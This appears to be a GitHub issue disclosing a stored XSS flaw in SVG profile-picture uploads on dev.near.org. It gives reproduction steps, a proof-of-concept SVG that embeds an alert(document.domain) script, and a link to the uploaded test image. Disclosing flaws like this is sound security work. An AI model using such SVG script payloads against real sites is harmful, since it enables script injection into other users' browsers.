Stored xss vuln in dev.near.org

Vulnerability details
A stored XSS vulnerability exists in the profile picture upload functionality on dev.near.org. The application allows users to upload SVG files as profile pictures, but it does not sanitize the contents of the SVG. This enables an attacker to inject malicious scripts, leading to the execution of JavaScript when the image is viewed.

[ Validation steps]
1) Navigate to the profile picture upload section on dev.near.org.

2) Create a malicious SVG file with embedded JavaScript. Example content:
Copy code

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="1500" height="1500" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>           
and paste it one note pad and save it as .svg file

3) Upload the crafted SVG file as the profile picture or the background.



4) Once uploaded, open/view the profile image (e.g., in a browser or image link).



5) Observe that the JavaScript is executed, triggering the alert box.

6) here is the image link https://ipfs.near.social/ipfs/bafkreidroiiw35saf3n7cjhrbkqv6iiyocltkmbuxg7bl5fl5axou32rvu

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Stored xss vuln in dev.near.org #203

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Stored xss vuln in dev.near.org #203

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions